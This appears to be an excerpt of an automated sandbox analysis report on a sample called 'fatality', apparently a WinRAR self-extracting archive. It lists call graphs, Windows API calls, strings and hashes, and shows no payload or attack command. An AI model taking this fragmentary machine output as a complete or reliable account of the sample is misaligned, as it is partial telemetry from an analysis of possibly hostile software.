40956->40961 40957->40953 40957->40960 40958 de3b2d 2 API calls 40959 de1cde 40958->40959 40959->40958 40959->40960 40960->40930 40961->40959 40962->40957 41059 decf3d 40963->41059 40965 de8440 40965->40928 41063 dfde6b 40966->41063 40970 de1f77 __EH_prolog 40969->40970 40972 de1fa6 40970->40972 41067 de19af 40970->41067 40972->40933 40974 de3b3d 40973->40974 40975 de3b39 40973->40975 40982 
de9e80 SetFilePointer 40974->40982 40975->40933 40976 de3b4f 40977 de3b6a 40976->40977 40978 de3b78 40976->40978 40981 de3b76 40977->40981 41128 de32f7 SetFilePointer DialogBoxParamW _swprintf __EH_prolog 40977->41128 41129 de286b SetFilePointer DialogBoxParamW __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __EH_prolog _strlen 40978->41129 40981->40933 40982->40976 40984 de8498 __EH_prolog 40983->40984 40989 de84d5 40984->40989 40994 de8513 40984->40994 41146 df8c8d 19 API calls 40984->41146 40985 de84f5 40987 de851c 40985->40987 40988 de84fa 40985->40988 40987->40994 41148 df8c8d 19 API calls 40987->41148 40988->40994 41147 de7a0d 29 API calls 40988->41147 40989->40985 40993 de857a 40989->40993 40989->40994 40993->40994 41130 de5d1a 40993->41130 40994->40933 40995 de8605 40995->40994 41136 de8167 40995->41136 40997 de8797 40998 dea56d 3 API calls 40997->40998 41002 de8802 40997->41002 40998->41002 41000 de8a5f 41003 de8ab6 41000->41003 41016 de8a6a 41000->41016 41001 de898b 41001->41000 41006 de89e1 41001->41006 41002->40994 41002->41001 41149 de8117 DialogBoxParamW 41002->41149 41009 de8a4c 41003->41009 41152 de7fc0 9 API calls 41003->41152 41004 de8b14 41020 de8b5a 41004->41020 41049 de90eb 41004->41049 41153 de98bc 41004->41153 41005 de8ab4 41010 de959a 2 API calls 41005->41010 41006->41004 41006->41009 41011 dea231 2 API calls 41006->41011 41008 de959a 2 API calls 41008->40994 41009->41004 41009->41005 41010->40994 41012 de8a19 41011->41012 41012->41009 41150 de92a3 9 API calls 41012->41150 41014 deab1a UnhandledExceptionFilter 41015 de8bd1 41014->41015 41017 deab1a UnhandledExceptionFilter 41015->41017 41016->41005 41151 de7db2 9 API calls 41016->41151 41030 de8be7 41017->41030 41020->41014 41021 de8d18 41024 de8d8a 41021->41024 41025 de8d28 41021->41025 41022 de8e40 41026 de8e66 41022->41026 41027 de8e52 41022->41027 41044 de8d37 41022->41044 41023 de8cbc 41023->41021 41023->41022 41031 de8167 2 API calls 41024->41031 41025->41044 41157 de77b8 10 API calls 
41025->41157 41029 df3377 20 API calls 41026->41029 41028 de9215 21 API calls 41027->41028 41028->41044 41032 de8e7f 41029->41032 41030->41023 41033 de8c93 41030->41033 41038 de981a SetFilePointer 41030->41038 41034 de8dbd 41031->41034 41160 df3020 21 API calls 41032->41160 41033->41023 41156 de9a3c SetFilePointer SetFilePointer SetEndOfFile 41033->41156 41039 de8de6 41034->41039 41040 de8df5 41034->41040 41034->41044 41038->41033 41158 de7542 GetFileAttributesW GetFileAttributesW CreateDirectoryW SetFileAttributesW 41039->41158 41159 de9155 5 API calls __EH_prolog 41040->41159 41043 de9090 41046 dea4ed SetFileAttributesW 41043->41046 41043->41049 41044->41043 41045 de903e 41044->41045 41044->41049 41142 de9f09 SetEndOfFile 41044->41142 41143 de9da2 41045->41143 41046->41049 41049->41008 41050 de9085 41051 de9620 CloseHandle 41050->41051 41051->41043 41053 de16a4 41052->41053 41054 de8420 41053->41054 41055 de95ca 41053->41055 41056 de95d1 41053->41056 41054->40906 41057 de974e DeleteFileW 41055->41057 41058 de9620 CloseHandle 41056->41058 41057->41054 41058->41054 41060 decf4d 41059->41060 41061 decf54 41059->41061 41062 de981a SetFilePointer 41060->41062 41061->40965 41062->41061 41064 dfde78 _swprintf 41063->41064 41065 dfd4d4 16 API calls 41064->41065 41066 df1b7c 41065->41066 41066->40929 41068 de19bb 41067->41068 41069 de19bf 41067->41069 41068->40972 41071 de18f6 41069->41071 41072 de1908 41071->41072 41073 de1945 41071->41073 41074 de3b2d 2 API calls 41072->41074 41079 de3fa3 41073->41079 41077 de1928 41074->41077 41077->41068 41082 de3fac 41079->41082 41080 de3b2d 2 API calls 41080->41082 41081 de1966 41081->41077 41083 de1e50 41081->41083 41082->41080 41082->41081 41084 de1e5a __EH_prolog 41083->41084 41087 de3bba 41084->41087 41086 de1e84 _wcslen 41086->41077 41088 de3bc4 __EH_prolog 41087->41088 41097 de3bda 41088->41097 41098 df3377 41088->41098 41091 de3c71 41091->41097 41106 deab1a 41091->41106 41092 de3d41 41093 de3dd7 41092->41093 41094 de3dc7 
41092->41094 41117 df3020 21 API calls 41093->41117 41110 de9215 41094->41110 41097->41086 41099 df338c ___std_exception_copy 41098->41099 41100 df341c 41099->41100 41102 df3440 _abort 41099->41102 41103 df34c6 _com_raise_error 41099->41103 41118 df32aa 20 API calls 3 library calls 41100->41118 41102->41091 41105 df3524 41103->41105 41119 df3106 20 API calls 41103->41119 41105->41091 41107 deab28 41106->41107 41109 deab32 41106->41109 41108 dfeb38 UnhandledExceptionFilter 41107->41108 41108->41109 41109->41092 41111 de921f __EH_prolog 41110->41111 41120 ded114 41111->41120 41113 de9243 41115 ded114 20 API calls 41113->41115 41116 de928a 41113->41116 41127 ded300 WriteFile UnhandledExceptionFilter __InternalCxxFrameHandler 41113->41127 41115->41113 41116->41097 41117->41097 41118->41102 41119->41103 41123 ded12a __InternalCxxFrameHandler 41120->41123 41121 ded29a 41122 ded0cb 6 API calls 41121->41122 41125 ded291 41121->41125 41122->41125 41123->41121 41124 df8c8d 19 API calls 41123->41124 41123->41125 41126 deac05 UnhandledExceptionFilter 41123->41126 41124->41123 41125->41113 41126->41123 41127->41113 41128->40981 41129->40981 41131 de5d2a 41130->41131 41161 de5c4b 41131->41161 41134 de5d5d 41135 de5d95 41134->41135 41166 deb1dc CharUpperW _wcslen ___vcrt_FlsGetValue 41134->41166 41135->40995 41137 de8186 41136->41137 41138 de8232 41137->41138 41173 debe5e CharUpperW UnhandledExceptionFilter __InternalCxxFrameHandler 41137->41173 41172 df1fac CharUpperW 41138->41172 41141 de823b 41141->40997 41142->41045 41144 de9db3 41143->41144 41145 de9e3f SetFileTime 41144->41145 41145->41050 41146->40989 41147->40994 41148->40994 41149->41002 41150->41009 41151->41005 41152->41009 41154 de98c5 GetFileType 41153->41154 41155 de98c2 41153->41155 41154->41155 41155->41020 41156->41023 41157->41044 41158->41044 41159->41044 41160->41044 41167 de5b48 41161->41167 41163 de5c6c 41163->41134 41165 de5b48 CharUpperW 41165->41163 41166->41134 41169 de5b52 41167->41169 41168 de5c3a 
41168->41163 41168->41165 41169->41168 41171 deb1dc CharUpperW _wcslen ___vcrt_FlsGetValue 41169->41171 41171->41169 41172->41141 41173->41138 41175 dea6a8 41174->41175 41176 dea6c1 FindFirstFileW 41175->41176 41179 dea6fe 41175->41179 41177 dea6d0 41176->41177 41176->41179 41178 dea6e4 FindFirstFileW 41177->41178 41177->41179 41178->41179 41179->40941 41180->40837 41181->40837 41182->40840 41184 de1fe8 41183->41184 41185 de1a04 2 API calls 41184->41185 41186 de1ff5 41184->41186 41185->41186 41186->40852
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DFB7E5
                                                                      • Part of subcall function 00DE1316: GetDlgItem.USER32(00000000,00003021), ref: 00DE135A
                                                                      • Part of subcall function 00DE1316: SetWindowTextW.USER32(00000000,00E135F4), ref: 00DE1370
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFB8D1
                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB8EF
                                                                    • IsDialogMessageW.USER32(?,?), ref: 00DFB902
                                                                    • TranslateMessage.USER32(?), ref: 00DFB910
                                                                    • DispatchMessageW.USER32(?), ref: 00DFB91A
                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 00DFB93D
                                                                    • EndDialog.USER32(?,00000001), ref: 00DFB960
                                                                    • GetDlgItem.USER32(?,00000068), ref: 00DFB983
                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DFB99E
                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E135F4), ref: 00DFB9B1
                                                                      • Part of subcall function 00DFD453: _wcschr.LIBVCRUNTIME ref: 00DFD45C
                                                                      • Part of subcall function 00DFD453: _wcslen.LIBCMT ref: 00DFD47D
                                                                    • SetFocus.USER32(00000000), ref: 00DFB9B8
                                                                    • _swprintf.LIBCMT ref: 00DFBA24
                                                                      • Part of subcall function 00DFD4D4: GetDlgItem.USER32(00000068,?), ref: 00DFD4E8
                                                                      • Part of subcall function 00DFD4D4: ShowWindow.USER32(00000000,00000005,?,?), ref: 00DFD510
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DFD51B
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E135F4), ref: 00DFD529
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD53F
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DFD559
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD59D
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00DFD5AB
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD5BA
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD5E1
                                                                      • Part of subcall function 00DFD4D4: SendMessageW.USER32(00000000,000000C2,00000000,00E143F4), ref: 00DFD5F0
                                                                    • _swprintf.LIBCMT ref: 00DFBAC2
                                                                    • _swprintf.LIBCMT ref: 00DFBB7C
                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 00DFBC6F
                                                                    • _swprintf.LIBCMT ref: 00DFBD1E
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFBD7D
                                                                    • SetDlgItemTextW.USER32(?,00000065,00E135F4), ref: 00DFBD94
                                                                    • GetDlgItem.USER32(?,00000065), ref: 00DFBD9D
                                                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00DFBDAC
                                                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00DFBDBB
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFBE68
                                                                    • _wcslen.LIBCMT ref: 00DFBEBE
                                                                    • _swprintf.LIBCMT ref: 00DFBEE8
                                                                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 00DFBF32
                                                                    • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 00DFBF4C
                                                                    • GetDlgItem.USER32(?,00000068), ref: 00DFBF55
                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 00DFBF6B
                                                                    • GetDlgItem.USER32(?,00000066), ref: 00DFBF85
                                                                    • SetWindowTextW.USER32(00000000,00E2A472), ref: 00DFBFA7
                                                                    • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 00DFC007
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFC01A
                                                                    • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 00DFC0BD
                                                                    • EnableWindow.USER32(00000000,00000000), ref: 00DFC197
                                                                    • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 00DFC1D9
                                                                      • Part of subcall function 00DFC73F: __EH_prolog.LIBCMT ref: 00DFC744
                                                                    • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 00DFC1FD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                     • Associated: 00000000.00000002.2055350579.0000000000DE0000.00000002.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2055375618.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2055375618.0000000000E25000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2055375618.0000000000E42000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2055375618.0000000000E4C000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2055535884.0000000000E52000.00000080.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2055561200.0000000000E5B000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2055561200.0000000000F9C000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2055561200.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2055561200.0000000000FBC000.00000040.00000001.01000000.00000003.sdmp
                                                                     • Associated: 00000000.00000002.2055561200.00000000010C3000.00000040.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Message$ItemSend$Text$Window$_swprintf$Dialog$H_prologLong_wcslen$DispatchEnableExecuteFocusParamShellShowTranslate_wcschr
                                                                    • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$runas$winrarsfxmappingfile.tmp
                                                                    • API String ID: 4159181167-2266193177
                                                                    • Opcode ID: 75ef223892eab08976b19b6c48bbbdde4c01c87d292f0adb6cb904b0fb9b9ec6
                                                                    • Instruction ID: 7e3b78bb738f0f984e2efdbeadb5648c1b8c05611ff3328d76c0b7daa73be21f
                                                                    • Opcode Fuzzy Hash: 75ef223892eab08976b19b6c48bbbdde4c01c87d292f0adb6cb904b0fb9b9ec6
                                                                    • Instruction Fuzzy Hash: 6B42E47094028CBEEB21AB71DD4AFBE7B6CAB11700F098156F744B61D2CB749A49CB31

                                                                    APIs
                                                                      • Part of subcall function 00DFAC16: OleInitialize.OLE32(00000000), ref: 00DFAC2F
                                                                      • Part of subcall function 00DFAC16: SHGetMalloc.SHELL32(00E28438), ref: 00DFAC70
                                                                    • _swprintf.LIBCMT ref: 00DFE048
                                                                    • LoadIconW.USER32(00000000,00000064), ref: 00DFE078
                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 00DFE0C9
                                                                    • DeleteObject.GDI32 ref: 00DFE130
                                                                    • DeleteObject.GDI32(?), ref: 00DFE140
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: DeleteObject$DialogIconInitializeLoadMallocParam_swprintf
                                                                    • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz
                                                                    • API String ID: 203082903-632967962
                                                                    • Opcode ID: 7b7a9238761bd65da18470baff2c0bdb07879446a2685b14db1726b2e7ea57ed
                                                                    • Instruction ID: 87ccb68cb25ff7ae8b5b7c721df1a3ef9cc8825e76d968bc76618ee9f2753ec3
                                                                    • Opcode Fuzzy Hash: 7b7a9238761bd65da18470baff2c0bdb07879446a2685b14db1726b2e7ea57ed
                                                                    • Instruction Fuzzy Hash: 2561C371904388AFD320AF76EC49F7B7BA9EF49700F058429FA45B22A1DA749948C771

                                                                    APIs
                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000000,?,00DEA592,000000FF,?,?), ref: 00DEA6C4
                                                                      • Part of subcall function 00DEBB03: _wcslen.LIBCMT ref: 00DEBB27
                                                                    • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,00DEA592,000000FF,?,?), ref: 00DEA6F2
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst$_wcslen
                                                                    • String ID:
                                                                    • API String ID: 1818217402-0
                                                                    • Opcode ID: c6f0e867b7777e239e8e85059b81a45ab47770dfb9a2e796eb138aec33029bf8
                                                                    • Instruction ID: d3a4f651df838d15c258a79cb02229efc3e3e92c5290c387a3c5a99908d4c78a
                                                                    • Opcode Fuzzy Hash: c6f0e867b7777e239e8e85059b81a45ab47770dfb9a2e796eb138aec33029bf8
                                                                    • Instruction Fuzzy Hash: 9441717650055AABCB25EF69CC84AEDB7B8FB48350F144196E569E3200D734AE94CFA0
                                                                    APIs
                                                                    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,00000000), ref: 05256875
                                                                    • GetSystemInfo.KERNELBASE(?), ref: 05256887
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2056870207.0000000005250000.00000040.00001000.00020000.00000000.sdmp, Offset: 05250000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_5250000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: InfoInformationProcessQuerySystem
                                                                    • String ID:
                                                                    • API String ID: 1993426926-0
                                                                    • Opcode ID: 1fb10b1f584574fc7e7ef76664c1f67970bd54e56cc62cee208ca94fa62fd050
                                                                    • Instruction ID: 44ff9c54197081f63a4720ae10fbd495e39f3372751889b54501d585c55d2a67
                                                                    • Opcode Fuzzy Hash: 1fb10b1f584574fc7e7ef76664c1f67970bd54e56cc62cee208ca94fa62fd050
                                                                    • Instruction Fuzzy Hash: C2F01C7660421DEBCB04DF99DC49EDEBBB8EB09740B008029FD06D7250DB30A910CBE0
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: H_prolog
                                                                    • String ID:
                                                                    • API String ID: 3519838083-0
                                                                    • Opcode ID: 923799d6d75aba5546986b8fa1695d81022df9af3034dea9e5edbd439fcb9f90
                                                                    • Instruction ID: 31ab248d924ffa957755134ef82008273abdf85df2200d34dd2e643c19524aa9
                                                                    • Opcode Fuzzy Hash: 923799d6d75aba5546986b8fa1695d81022df9af3034dea9e5edbd439fcb9f90
                                                                    • Instruction Fuzzy Hash: A382F9709042C5AEDF15EF65C891BFABBB9AF15300F0C41B9E84D9B182DB315A88DB70
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: feb405079cc966e0d4953044817479f597fe7b0244b6a474c17a8f47bc8e2012
                                                                    • Instruction ID: 6db7026b303a479e86bb1d265cf870bcf0a316a04c52e27191b5947bf9181a16
                                                                    • Opcode Fuzzy Hash: feb405079cc966e0d4953044817479f597fe7b0244b6a474c17a8f47bc8e2012
                                                                    • Instruction Fuzzy Hash: 5FE04F31441148EFCF01AF21DD099893FAAEB04341F008458F849AA172CB36EE96CB90

                                                                    APIs
                                                                    • GetFileAttributesW.KERNELBASE(?,?,|<,00000800,?,00000000,?,00000800), ref: 00DF0C9C
                                                                    • _swprintf.LIBCMT ref: 00DF0D4A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AttributesFile_swprintf
                                                                    • String ID: ,<$D=$DXGIDebug.dll$RpcRtRemote.dll$SSPICLI.DLL$SetDefaultDllDirectories$SetDllDirectoryW$UXTheme.dll$WINNSI.DLL$WindowsCodecs.dll$XmlLite.dll$aclui.dll$apphelp.dll$atl.dll$browcli.dll$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$cryptbase.dll$cryptsp.dll$cryptui.dll$cscapi.dll$devrtl.dll$dfscli.dll$dhcpcsvc.dll$dhcpcsvc6.dll$dnsapi.DLL$dsrole.dll$dwmapi.dll$ieframe.dll$imageres.dll$iphlpapi.DLL$linkinfo.dll$lpk.dll$mlang.dll$mpr.dll$msasn1.dll$netapi32.dll$netutils.dll$ntmarta.dll$ntshrui.dll$oleaccrc.dll$peerdist.dll$profapi.dll$propsys.dll$psapi.dll$rasadhlp.dll$rsaenh.dll$samcli.dll$samlib.dll$secur32.dll$setupapi.dll$sfc_os.dll$shdocvw.dll$shell32.dll$slc.dll$srvcli.dll$userenv.dll$usp10.dll$uxtheme.dll$version.dll$wintrust.dll$wkscli.dll$ws2_32.dll$ws2help.dll$|<$|<
                                                                    • API String ID: 1328629133-1521521131
                                                                    • Opcode ID: 425be3904697bf4e46e69d4f1e8bddd8431adeb45a6a8d53815f5c6a5d83131f
                                                                    • Instruction ID: 4cd7e689a33ae64e9bcac46e5ed6ec9a7c0bd62c8f420d050071334870fb3b12
                                                                    • Opcode Fuzzy Hash: 425be3904697bf4e46e69d4f1e8bddd8431adeb45a6a8d53815f5c6a5d83131f
                                                                    • Instruction Fuzzy Hash: C6B175F0108384AED7309F61984ABDFBAE8EBC5704F51991DF28977251C7B08689CB62

                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DFC744
                                                                      • Part of subcall function 00DFAF98: _wcschr.LIBVCRUNTIME ref: 00DFB033
                                                                    • _wcslen.LIBCMT ref: 00DFCA0A
                                                                    • _wcslen.LIBCMT ref: 00DFCA13
                                                                    • SetWindowTextW.USER32(?,?), ref: 00DFCA71
                                                                    • _wcslen.LIBCMT ref: 00DFCAB3
                                                                    • _wcsrchr.LIBVCRUNTIME ref: 00DFCBFB
                                                                    • GetDlgItem.USER32(?,00000066), ref: 00DFCC36
                                                                    • SetWindowTextW.USER32(00000000,?), ref: 00DFCC46
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,00E2A472), ref: 00DFCC54
                                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00DFCC7F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$MessageSendTextWindow$H_prologItem_wcschr_wcsrchr
                                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                                    • API String ID: 3356938749-312220925
                                                                    • Opcode ID: 9dddb2d716ecbed6a9822f1cd09e20cce693710211930ed32c826700dcbf5f37
                                                                    • Instruction ID: 3758063dc0cc76f949cc1aecf77d7a0bc595031bbfc2a091f9d01e9576d6cef8
                                                                    • Opcode Fuzzy Hash: 9dddb2d716ecbed6a9822f1cd09e20cce693710211930ed32c826700dcbf5f37
                                                                    • Instruction Fuzzy Hash: 02E161B290025CAADB24EBA4DD85DFE77BCEB04310F0591A6F749E3041EB749A858F70
                                                                    APIs
                                                                    • __EH_prolog.LIBCMT ref: 00DEDA70
                                                                    • _wcschr.LIBVCRUNTIME ref: 00DEDA91
                                                                      • Part of subcall function 00DEC29A: _wcslen.LIBCMT ref: 00DEC2A2
                                                                      • Part of subcall function 00DF05DA: _wcslen.LIBCMT ref: 00DF05E0
                                                                    • _wcslen.LIBCMT ref: 00DEDDE9
                                                                    • __fprintf_l.LIBCMT ref: 00DEDF1C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: _wcslen$H_prolog__fprintf_l_wcschr
                                                                    • String ID: $ ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$R$RTL$STRINGS$a
                                                                    • API String ID: 1810648836-2415259559
                                                                    • Opcode ID: c375e3fad638377d3674c5bb1ed0e04353385dafd1e0b701afb90234d2e649ee
                                                                    • Instruction ID: d0e5e39dd412971772d19e72939a2f083582eb85417d9473852580f4317b80a5
                                                                    • Opcode Fuzzy Hash: c375e3fad638377d3674c5bb1ed0e04353385dafd1e0b701afb90234d2e649ee
                                                                    • Instruction Fuzzy Hash: 9532E0719002989BCF24FF69C841AEE77A9FF48700F44411AFA45AB281EBB1DD85CB70

                                                                    APIs
                                                                      • Part of subcall function 00DFB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00DFB579
                                                                      • Part of subcall function 00DFB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00DFB58A
                                                                      • Part of subcall function 00DFB568: IsDialogMessageW.USER32(00010486,?), ref: 00DFB59E
                                                                      • Part of subcall function 00DFB568: TranslateMessage.USER32(?), ref: 00DFB5AC
                                                                      • Part of subcall function 00DFB568: DispatchMessageW.USER32(?), ref: 00DFB5B6
                                                                    • GetDlgItem.USER32(00000068,?), ref: 00DFD4E8
                                                                    • ShowWindow.USER32(00000000,00000005,?,?), ref: 00DFD510
                                                                    • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00DFD51B
                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E135F4), ref: 00DFD529
                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD53F
                                                                    • SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 00DFD559
                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD59D
                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 00DFD5AB
                                                                    • SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 00DFD5BA
                                                                    • SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 00DFD5E1
                                                                    • SendMessageW.USER32(00000000,000000C2,00000000,00E143F4), ref: 00DFD5F0
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: Message$Send$DialogDispatchItemPeekShowTranslateWindow
                                                                    • String ID: \
                                                                    • API String ID: 3569833718-2967466578
                                                                    • Opcode ID: a5091c3813f6819e8c32c9cbd5d40bfa29840d5e5900e118bc28a62b1c354bd0
                                                                    • Instruction ID: e9c406cad7029f389f34a82bb9cd8dda02bd6b385547fbe7a3f891a87f8720ee
                                                                    • Opcode Fuzzy Hash: a5091c3813f6819e8c32c9cbd5d40bfa29840d5e5900e118bc28a62b1c354bd0
                                                                    • Instruction Fuzzy Hash: 77310475145346BFE311DF31DC0AFAB7FADEB83708F000608F651A6290DBA48A0A8776

                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow$ExecuteShell_wcslen
                                                                    • String ID: .exe$.inf$Install
                                                                    • API String ID: 855908426-1844831949
                                                                    • Opcode ID: aa0e351e02f8c161fbea9c2f1baafc4dc79bbe5ce84c4b3ca7df823c42348582
                                                                    • Instruction ID: a07a8899bc1826f9894ef3374f3e282cafce4097174dd7e5548f0d27ab88c4ed
                                                                    • Opcode Fuzzy Hash: aa0e351e02f8c161fbea9c2f1baafc4dc79bbe5ce84c4b3ca7df823c42348582
                                                                    • Instruction Fuzzy Hash: 3351F5714043889EDB309F65D8447BBBBE7AF81744F0A841EFAC4A7191D7B18989CB72

                                                                    APIs
                                                                    • GetClassNameW.USER32(?,?,00000050), ref: 00DFABC2
                                                                    • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00DFABE9
                                                                    • SHAutoComplete.SHLWAPI(?,00000010), ref: 00DFABF9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2055375618.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_de0000_fatality.jbxd
                                                                    Similarity
                                                                    • API ID: AutoClassCompleteFindNameWindow
                                                                    • String ID: @Ut$EDIT
                                                                    • API String ID: 1162832696-2065656831
                                                                    • Opcode ID: b47aca23fa7f529084335535ad285f88fb95a502034bcfa1020a7088af5605d8
